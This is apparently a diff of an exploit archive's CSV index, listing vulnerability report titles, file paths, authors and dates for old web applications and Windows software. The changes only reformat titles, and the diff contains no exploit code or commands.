26477,platforms/php/webapps/26477.txt,"XMB 1.9.3 U2U.php Cross-Site Scripting",2005-11-07,"HACKERS PAL",php,webapps,0 @@ -23630,7 +23630,7 @@ id,file,description,date,author,platform,type,port 26503,platforms/php/webapps/26503.txt,"Wizz Forum ForumAuthDetails.php AuthID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26504,platforms/php/webapps/26504.txt,"Wizz Forum ForumReply.php TopicID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26505,platforms/php/webapps/26505.txt,"Codegrrl Protection.php Unspecified Code Execution",2005-11-14,"Robin Verton",php,webapps,0 -26506,platforms/cgi/webapps/26506.txt,"Walla TeleSite 3.0 ts.exe tsurl Variable Arbitrary Article Access",2005-11-15,"Rafi Nahum",cgi,webapps,0 +26506,platforms/cgi/webapps/26506.txt,"Walla TeleSite 3.0 ts.exe tsurl Variable - Arbitrary Article Access",2005-11-15,"Rafi Nahum",cgi,webapps,0 26507,platforms/cgi/webapps/26507.txt,"Walla TeleSite 3.0 ts.exe sug Parameter XSS",2005-11-15,"Rafi Nahum",cgi,webapps,0 26508,platforms/cgi/webapps/26508.txt,"Walla TeleSite 3.0 ts.exe sug Parameter SQL Injection",2005-11-15,"Rafi Nahum",cgi,webapps,0 26509,platforms/cgi/webapps/26509.txt,"Walla TeleSite 3.0 ts.cgi File Existence Enumeration",2005-11-15,"Rafi Nahum",cgi,webapps,0 @@ -23667,7 +23667,7 @@ id,file,description,date,author,platform,type,port 26540,platforms/linux/remote/26540.txt,"Inkscape 0.41/0.42 SVG Image Buffer Overflow",2005-11-21,"Joxean Koret",linux,remote,0 26541,platforms/php/webapps/26541.txt,"SimplePoll Results.php SQL Injection",2005-11-21,stranger-killer,php,webapps,0 26542,platforms/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote,0 -26543,platforms/php/webapps/26543.txt,"APBoard Thread.php SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 +26543,platforms/php/webapps/26543.txt,"APBoard - Thread.php SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 26544,platforms/php/webapps/26544.txt,"PHP Download Manager 1.1.x - Files.php SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 26545,platforms/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - Search Module SQL Injection",2005-11-21,Lostmon,php,webapps,0 26546,platforms/php/webapps/26546.txt,"PHPPost 1.0 profile.php user Parameter XSS",2005-11-21,trueend5,php,webapps,0 @@ -23678,7 +23678,7 @@ id,file,description,date,author,platform,type,port 26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 - index.pl Multiple Parameter XSS",2005-11-22,"Moritz Naumann",cgi,webapps,0 26553,platforms/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",php,webapps,0 -26554,platforms/windows/local/26554.rb,"Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation",2013-07-02,Metasploit,windows,local,0 +26554,platforms/windows/local/26554.rb,"Windows - EPATHOBJ::pprFlattenRec Local Privilege Escalation",2013-07-02,Metasploit,windows,local,0 26555,platforms/windows/dos/26555.txt,"Opera 12.15 vtable Corruption",2013-07-02,echo,windows,dos,0 26828,platforms/php/webapps/26828.txt,"QuickPayPro 3.1 customer.tickets.view.php Multiple Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26557,platforms/windows/dos/26557.txt,"WinAmp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0 @@ -23686,9 +23686,9 @@ id,file,description,date,author,platform,type,port 26559,platforms/php/webapps/26559.txt,"Virtual Hosting Control System 2.2/2.4 - Error Message Cross-Site Scripting",2005-11-22,"Moritz Naumann",php,webapps,0 26560,platforms/php/webapps/26560.txt,"PmWiki 2.0.x - Search Cross-Site Scripting",2005-11-22,"Moritz Naumann",php,webapps,0 26561,platforms/php/webapps/26561.txt,"1-2-3 Music Store 1.0 - Process.php SQL Injection",2005-11-23,r0t,php,webapps,0 -26562,platforms/php/webapps/26562.txt,"AFFCommerce Shopping Cart 1.1.4 SubCategory.php cl Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 -26563,platforms/php/webapps/26563.txt,"AFFCommerce Shopping Cart 1.1.4 ItemInfo.php item_id Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 -26564,platforms/php/webapps/26564.txt,"AFFCommerce Shopping Cart 1.1.4 ItemReview.php item_id Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 +26562,platforms/php/webapps/26562.txt,"AFFCommerce Shopping Cart 1.1.4 - SubCategory.php cl Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 +26563,platforms/php/webapps/26563.txt,"AFFCommerce Shopping Cart 1.1.4 - ItemInfo.php item_id Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 +26564,platforms/php/webapps/26564.txt,"AFFCommerce Shopping Cart 1.1.4 - ItemReview.php item_id Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 26565,platforms/php/webapps/26565.txt,"Tunez 1.21 songinfo.php song_id Parameter SQL Injection",2005-11-23,r0t3d3Vil,php,webapps,0 26566,platforms/php/webapps/26566.txt,"Tunez 1.21 - search.php searchFor Parameter XSS",2005-11-23,r0t3d3Vil,php,webapps,0 26567,platforms/php/webapps/26567.txt,"WSN Forum 1.21 Memberlist.php SQL Injection",2005-11-23,r0t,php,webapps,0 @@ -23705,7 +23705,7 @@ id,file,description,date,author,platform,type,port 26578,platforms/windows/dos/26578.py,"Realtek Sound Manager AvRack (.wav) - Crash PoC",2013-07-03,Asesino04,windows,dos,0 26579,platforms/windows/local/26579.rb,"ABBS Audio Media Player - .LST Buffer Overflow",2013-07-03,Metasploit,windows,local,0 26580,platforms/php/webapps/26580.txt,"SoftBiz Web Hosting Directory Script 1.1 - search_result.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 -26581,platforms/php/webapps/26581.txt,"SoftBiz Web Hosting Directory Script 1.1 review.php sbres_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 +26581,platforms/php/webapps/26581.txt,"SoftBiz Web Hosting Directory Script 1.1 - review.php sbres_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 26582,platforms/php/webapps/26582.txt,"SoftBiz Web Hosting Directory Script 1.1 - browsecats.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 26583,platforms/php/webapps/26583.txt,"SoftBiz Web Hosting Directory Script 1.1 - email.php h_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 26584,platforms/php/webapps/26584.txt,"vtiger CRM 4.2 Leads Module record Parameter XSS",2005-11-24,"Christopher Kunz",php,webapps,0 @@ -23762,10 +23762,10 @@ id,file,description,date,author,platform,type,port 26636,platforms/php/webapps/26636.txt,"PHP Web Statistik 1.4 - Content Injection",2005-11-28,"Francesco Ongaro",php,webapps,0 26637,platforms/php/webapps/26637.txt,"Helpdesk Issue Manager 0.x - issue.php id Parameter SQL Injection",2005-11-28,r0t3d3Vil,php,webapps,0 26638,platforms/php/webapps/26638.txt,"Helpdesk Issue Manager 0.x - find.php Multiple Parameter SQL Injection",2005-11-28,r0t3d3Vil,php,webapps,0 -26639,platforms/php/webapps/26639.txt,"GuppY 4.5 editorTypetool.php meskin Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 -26640,platforms/php/webapps/26640.txt,"GuppY 4.5 archbatch.php lng Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 -26641,platforms/php/webapps/26641.txt,"GuppY 4.5 dbbatch.php lng Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 -26642,platforms/php/webapps/26642.txt,"GuppY 4.5 nwlmail.php lng Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 +26639,platforms/php/webapps/26639.txt,"GuppY 4.5 editorTypetool.php meskin Parameter Traversal - Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 +26640,platforms/php/webapps/26640.txt,"GuppY 4.5 archbatch.php lng Parameter Traversal - Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 +26641,platforms/php/webapps/26641.txt,"GuppY 4.5 dbbatch.php lng Parameter Traversal - Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 +26642,platforms/php/webapps/26642.txt,"GuppY 4.5 nwlmail.php lng Parameter Traversal - Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 26643,platforms/php/webapps/26643.txt,"PHP Doc System 1.5.1 - Local File Inclusion",2005-11-28,r0t,php,webapps,0 26644,platforms/php/webapps/26644.txt,"SearchSolutions 1.2/1.3 - Multiple Products Cross-Site Scripting Vulnerabilities",2005-11-28,r0t,php,webapps,0 26645,platforms/php/webapps/26645.txt,"ASP-Rider 1.6 - Default.ASP SQL Injection",2005-11-29,info@hoder.com,php,webapps,0 @@ -23792,10 +23792,10 @@ id,file,description,date,author,platform,type,port 26666,platforms/linux/dos/26666.c,"CenterICQ 4.20/4.5 - Malformed Packet Handling Remote Denial of Service",2005-11-29,"Wernfried Haas",linux,dos,0 26667,platforms/php/webapps/26667.txt,"SocketKB 1.1 - Index.php SQL Injection",2005-11-30,r0t,php,webapps,0 26668,platforms/php/webapps/26668.txt,"PHPAlbum 0.2.3/4.1 - Local File Inclusion",2005-11-30,r0t3d3Vil,php,webapps,0 -26669,platforms/php/webapps/26669.txt,"SoftBiz B2B trading Marketplace Script 1.1 selloffers.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26670,platforms/php/webapps/26670.txt,"SoftBiz B2B trading Marketplace Script 1.1 buyoffers.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26671,platforms/php/webapps/26671.txt,"SoftBiz B2B trading Marketplace Script 1.1 products.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 -26672,platforms/php/webapps/26672.txt,"SoftBiz B2B trading Marketplace Script 1.1 profiles.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26669,platforms/php/webapps/26669.txt,"SoftBiz B2B trading Marketplace Script 1.1 - selloffers.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26670,platforms/php/webapps/26670.txt,"SoftBiz B2B trading Marketplace Script 1.1 - buyoffers.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26671,platforms/php/webapps/26671.txt,"SoftBiz B2B trading Marketplace Script 1.1 - products.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 +26672,platforms/php/webapps/26672.txt,"SoftBiz B2B trading Marketplace Script 1.1 - profiles.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26673,platforms/php/webapps/26673.txt,"SoftBiz FAQ 1.1 - index.php cid Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26674,platforms/php/webapps/26674.txt,"SoftBiz FAQ 1.1 - faq_qanda.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 26675,platforms/php/webapps/26675.txt,"SoftBiz FAQ 1.1 refer_friend.php id Parameter SQL Injection",2005-11-30,r0t,php,webapps,0 @@ -23831,7 +23831,7 @@ id,file,description,date,author,platform,type,port 26705,platforms/asp/webapps/26705.txt,"SiteBeater News 4.0 Archive.ASP Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 26706,platforms/php/webapps/26706.txt,"PHP-Fusion 6.0.109 Messages.php SQL Injection",2005-12-03,"Nolan West",php,webapps,0 26707,platforms/php/webapps/26707.txt,"Alisveristr E-commerce Login - Multiple SQL Injection",2005-12-03,B3g0k,php,webapps,0 -26708,platforms/windows/local/26708.rb,"ERS Viewer 2013 ERS File Handling Buffer Overflow",2013-07-09,Metasploit,windows,local,0 +26708,platforms/windows/local/26708.rb,"ERS Viewer 2013 - ERS File Handling Buffer Overflow",2013-07-09,Metasploit,windows,local,0 26709,platforms/lin_x86/local/26709.txt,"Solaris Recommended Patch Cluster 6/19 - Local Root on x86",2013-07-09,"Larry W. Cashdollar",lin_x86,local,0 26710,platforms/multiple/dos/26710.txt,"Apache CXF < 2.5.10 / 2.6.7 / 2.7.4 - Denial of Service",2013-07-09,"SEC Consult",multiple,dos,0 26713,platforms/php/webapps/26713.txt,"phpYellowTM 5.33 - search_result.php haystack Parameter SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 @@ -23893,9 +23893,9 @@ id,file,description,date,author,platform,type,port 26770,platforms/php/webapps/26770.txt,"MilliScripts 1.4 - Register.php Cross-Site Scripting",2005-12-08,"Security Nation",php,webapps,0 26771,platforms/cgi/webapps/26771.txt,"Nortel SSL VPN 4.2.1.6 - Web Interface Input Validation",2005-12-08,"Daniel Fabian",cgi,webapps,0 26772,platforms/cfm/webapps/26772.txt,"Magic Book Professional 2.0 Book.CFM Cross-Site Scripting",2005-12-12,r0t,cfm,webapps,0 -26773,platforms/windows/remote/26773.txt,"LogiSphere 0.9.9 j viewsource.jsp source Parameter Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 -26774,platforms/windows/remote/26774.txt,"LogiSphere 0.9.9 j Search URL NS-query-pat Parameter Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 -26775,platforms/windows/remote/26775.txt,"LogiSphere 0.9.9 j URI Multiple Method Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 +26773,platforms/windows/remote/26773.txt,"LogiSphere 0.9.9 j viewsource.jsp source Parameter Traversal - Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 +26774,platforms/windows/remote/26774.txt,"LogiSphere 0.9.9 j Search URL NS-query-pat Parameter Traversal - Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 +26775,platforms/windows/remote/26775.txt,"LogiSphere 0.9.9 j URI Multiple Method Traversal - Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 26776,platforms/windows/dos/26776.txt,"Sights 'N Sounds Streaming Media Server 2.0.3 - SWS.EXE Buffer Overflow",2005-12-12,dr_insane,windows,dos,0 26777,platforms/asp/webapps/26777.txt,"LocazoList Classifieds 1.0 - SearchDB.ASP Input Validation",2005-12-12,r0t3d3Vil,asp,webapps,0 26778,platforms/jsp/webapps/26778.txt,"Blackboard Academic Suite 6.2.3.23 Frameset.JSP Cross-Domain Frameset Loading",2005-12-12,dr_insane,jsp,webapps,0 @@ -23960,7 +23960,7 @@ id,file,description,date,author,platform,type,port 26841,platforms/php/webapps/26841.txt,"MarmaraWeb E-Commerce Remote File Inclusion",2005-12-15,B3g0k,php,webapps,0 26842,platforms/cgi/webapps/26842.txt,"Sitenet BBS 2.0 netboardr.cgi Multiple Parameter XSS",2005-12-15,r0t3d3Vil,cgi,webapps,0 26843,platforms/cgi/webapps/26843.txt,"Sitenet BBS 2.0 - search.cgi cid Parameter XSS",2005-12-15,r0t3d3Vil,cgi,webapps,0 -26844,platforms/php/webapps/26844.txt,"DCForum 1-6 DCBoard Script Page Parameter Cross-Site Scripting",2005-12-15,r0t3d3Vil,php,webapps,0 +26844,platforms/php/webapps/26844.txt,"DCForum 1-6 DCBoard Script - Page Parameter Cross-Site Scripting",2005-12-15,r0t3d3Vil,php,webapps,0 26845,platforms/cgi/webapps/26845.txt,"Atlant Pro 8.0.9 - Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 26846,platforms/cgi/webapps/26846.txt,"AltantForum 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-15,r0t3d3Vil,cgi,webapps,0 26847,platforms/cgi/webapps/26847.txt,"eDatCat 3.0 EDCstore.PL Cross-Site Scripting",2005-12-15,r0t3d3Vil,cgi,webapps,0 @@ -24082,7 +24082,7 @@ id,file,description,date,author,platform,type,port 26963,platforms/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise news_and_events_new.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 26964,platforms/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise news.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 Type Parameter SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0 -26966,platforms/multiple/remote/26966.txt,"httprint 202.0 HTTP Response Server Field Arbitrary Script Injection",2005-12-22,"Mariano Nunez Di Croce",multiple,remote,0 +26966,platforms/multiple/remote/26966.txt,"httprint 202.0 - HTTP Response Server Field Arbitrary Script Injection",2005-12-22,"Mariano Nunez Di Croce",multiple,remote,0 26967,platforms/multiple/dos/26967.txt,"httprint 202.0 HTTP Response Server Field Overflow DoS",2005-12-22,"Mariano Nunez Di Croce",multiple,dos,0 26968,platforms/php/webapps/26968.txt,"SyntaxCMS Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 Action Parameter Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0 @@ -24104,20 +24104,20 @@ id,file,description,date,author,platform,type,port 26985,platforms/windows/dos/26985.txt,"Microsoft Internet Explorer 5.0.1 - HTML Parsing Denial of Service",2005-12-27,"Christian Deneke",windows,dos,0 26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting",2005-12-23,r0t3d3Vil,cfm,webapps,0 26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0 -26988,platforms/php/webapps/26988.txt,"Koobi 5.0 BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 +26988,platforms/php/webapps/26988.txt,"Koobi 5.0 - BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0 26990,platforms/php/webapps/26990.txt,"MyBB 1.0 Globa.php Cookie Data SQL Injection",2005-12-29,imei,php,webapps,0 26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products - SQL Injection",2005-12-30,DevilBox,asp,webapps,0 -26992,platforms/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 -26993,platforms/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 +26992,platforms/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 +26993,platforms/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 26994,platforms/php/webapps/26994.txt,"Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-30,r0t3d3Vil,php,webapps,0 26995,platforms/php/webapps/26995.txt,"PHPDocumentor 1.2/1.3 Forum Lib Variable Cross-Site Scripting",2005-12-30,"zeus olimpusklan",php,webapps,0 26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 GetShell and GetCommand File Enumeration",2005-12-30,xfocus,aix,local,0 26997,platforms/aix/local/26997.txt,"IBM AIX 5.3 GetShell and GetCommand Partial File Disclosure",2006-01-01,xfocus,aix,local,0 -26998,platforms/php/webapps/26998.txt,"OABoard 1.0 Forum - Script Remote File Inclusion",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 +26998,platforms/php/webapps/26998.txt,"OABoard 1.0 Forum - Remote File Inclusion",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 26999,platforms/php/webapps/26999.txt,"PHPBook 1.x - Mail Field PHP Code Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27000,platforms/php/webapps/27000.txt,"VEGO Web Forum 1.x - Theme_ID SQL Injection",2005-12-28,"Aliaksandr Hartsuyeu",php,webapps,0 -27001,platforms/php/webapps/27001.txt,"VEGO Links Builder 2.0 Login Script SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 +27001,platforms/php/webapps/27001.txt,"VEGO Links Builder 2.0 Login Script - SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27002,platforms/php/webapps/27002.txt,"Jevontech PHPenpals PersonalID SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27003,platforms/php/webapps/27003.txt,"InTouch 0.5.1 Alpha - User Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27004,platforms/php/webapps/27004.txt,"PHPJournaler 1.0 Readold Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24133,7 +24133,7 @@ id,file,description,date,author,platform,type,port 27010,platforms/windows/dos/27010.txt,"VbsEdit 5.9.3 - (.smi) Buffer Overflow",2013-07-22,d3b4g,windows,dos,0 27011,platforms/jsp/webapps/27011.txt,"Sybase EAServer 6.3.1 - Multiple Vulnerabilities",2013-07-22,"SEC Consult",jsp,webapps,0 27012,platforms/windows/remote/27012.rb,"Apple Quicktime 7 - Invalid Atom Length Buffer Overflow",2013-07-22,Metasploit,windows,remote,0 -27013,platforms/windows/remote/27013.rb,"HP Managed Printing Administration jobAcct Remote Command Execution",2013-07-22,Metasploit,windows,remote,0 +27013,platforms/windows/remote/27013.rb,"HP Managed Printing Administration - jobAcct Remote Command Execution",2013-07-22,Metasploit,windows,remote,0 27015,platforms/php/webapps/27015.txt,"Chipmunk Guestbook 1.4 Homepage HTML Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27016,platforms/php/webapps/27016.txt,"Chimera Web Portal 0.2 modules.php Multiple Parameter XSS",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27017,platforms/php/webapps/27017.txt,"Chimera Web Portal 0.2 linkcategory.php id Parameter SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24167,13 +24167,13 @@ id,file,description,date,author,platform,type,port 27041,platforms/windows/local/27041.pl,"Super Player 3500 - (.m3u) Local Stack Based Buffer Overflow",2013-07-23,jun,windows,local,0 27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0 27043,platforms/hardware/dos/27043.py,"Samsung PS50C7700 TV - Denial of Service",2013-07-23,"Malik Mesellem",hardware,dos,5600 -27044,platforms/hardware/remote/27044.rb,"D-Link Devices UPnP SOAP Command Execution",2013-07-23,Metasploit,hardware,remote,0 +27044,platforms/hardware/remote/27044.rb,"D-Link Devices - UPnP SOAP Command Execution",2013-07-23,Metasploit,hardware,remote,0 27045,platforms/linux/remote/27045.rb,"Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection",2013-07-23,Metasploit,linux,remote,443 27046,platforms/windows/remote/27046.rb,"VMware vCenter - Chargeback Manager ImageUploadServlet Arbitrary File Upload",2013-07-23,Metasploit,windows,remote,443 27047,platforms/windows/dos/27047.txt,"Artweaver 3.1.5 - (.awd) Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0 27049,platforms/windows/dos/27049.txt,"XnView 2.03 - (.pct) Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 -27050,platforms/windows/dos/27050.txt,"DirectShow Arbitrary Memory Overwrite (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos,0 +27050,platforms/windows/dos/27050.txt,"DirectShow - Arbitrary Memory Overwrite (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos,0 27051,platforms/windows/dos/27051.txt,"Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0 27052,platforms/php/webapps/27052.txt,"427BB 2.2 - Showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27053,platforms/php/webapps/27053.txt,"Venom Board - Post.php3 Multiple SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24197,12 +24197,12 @@ id,file,description,date,author,platform,type,port 27071,platforms/asp/webapps/27071.txt,"Fog Creek Software FogBugz 4.0 29 - Default.ASP Cross-Site Scripting",2006-01-12,"M.Neset KABAKLI",asp,webapps,0 27072,platforms/windows/remote/27072.pl,"Microsoft Visual Studio - UserControl Remote Code Execution (1)",2006-01-12,anonymous,windows,remote,0 27073,platforms/windows/remote/27073.txt,"Microsoft Visual Studio - UserControl Remote Code Execution (2)",2006-01-12,priestmaster,windows,remote,0 -27075,platforms/php/webapps/27075.txt,"TankLogger 2.4 General Functions Script SQL Injection",2006-01-12,"Aliaksandr Hartsuyeu",php,webapps,0 +27075,platforms/php/webapps/27075.txt,"TankLogger 2.4 General Functions Script - SQL Injection",2006-01-12,"Aliaksandr Hartsuyeu",php,webapps,0 27076,platforms/hardware/webapps/27076.txt,"FOSCAM IP-Cameras Improper Access Restrictions",2013-07-24,"Core Security",hardware,webapps,80 27077,platforms/php/webapps/27077.txt,"DCP Portal 5.3/6.0/6.1 - Multiple Input Validation Vulnerabilities",2006-01-13,night_warrior771,php,webapps,0 -27078,platforms/php/webapps/27078.txt,"AlstraSoft Template Seller Pro 3.25 Fullview.php Cross-Site Scripting",2006-01-13,night_warrior771,php,webapps,0 +27078,platforms/php/webapps/27078.txt,"AlstraSoft Template Seller Pro 3.25 - Fullview.php Cross-Site Scripting",2006-01-13,night_warrior771,php,webapps,0 27079,platforms/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 - ForgotPassword.ASP Cross-Site Scripting",2006-01-13,"M.Neset KABAKLI",asp,webapps,0 -27080,platforms/php/webapps/27080.txt,"EZDatabaseRemote 2.0 PHP Script Code Execution",2006-01-14,r0t3d3Vil,php,webapps,0 +27080,platforms/php/webapps/27080.txt,"EZDatabaseRemote 2.0 - PHP Script Code Execution",2006-01-14,r0t3d3Vil,php,webapps,0 27081,platforms/cgi/webapps/27081.txt,"Ultimate Auction 3.67 Item.PL Cross-Site Scripting",2006-01-14,querkopf,cgi,webapps,0 27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed IMG and XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0 27083,platforms/asp/webapps/27083.txt,"8Pixel.net SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps,0 @@ -24226,12 +24226,12 @@ id,file,description,date,author,platform,type,port 27101,platforms/windows/dos/27101.txt,"Computer Associates Unicenter 6.0 - Remote Control DM Primer Remote Denial of Service",2006-01-17,Karma,windows,dos,0 27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - index.php search Parameter XSS",2006-01-17,night_warrior771,php,webapps,0 27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - search.php search Parameter XSS",2006-01-17,night_warrior771,php,webapps,0 -27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 url BBcode XSS",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 +27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - url BBcode XSS",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - login.php username Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 -27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 +27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27107,platforms/php/webapps/27107.txt,"phpXplorer 0.9.33 Action.php Directory Traversal",2006-01-16,liz0,php,webapps,0 27108,platforms/multiple/dos/27108.txt,"Dual DHCP DNS Server 1.0 DHCP Options Remote Buffer Overflow",2006-01-07,"Luigi Auriemma",multiple,dos,0 -27109,platforms/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 +27109,platforms/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 - BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 27110,platforms/php/webapps/27110.txt,"Eggblog 2.0 blog.php id Parameter SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0 27111,platforms/php/webapps/27111.txt,"Eggblog 2.0 - topic.php message Parameter XSS",2006-01-18,alex@evuln.com,php,webapps,0 27112,platforms/php/webapps/27112.txt,"SaralBlog 1.0 - Multiple Input Validation Vulnerabilities",2006-01-18,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24261,7 +24261,7 @@ id,file,description,date,author,platform,type,port 27136,platforms/php/webapps/27136.txt,"Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities",2013-07-27,"SEC Consult",php,webapps,0 27137,platforms/php/webapps/27137.txt,"MyBB 1.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-26,imei,php,webapps,0 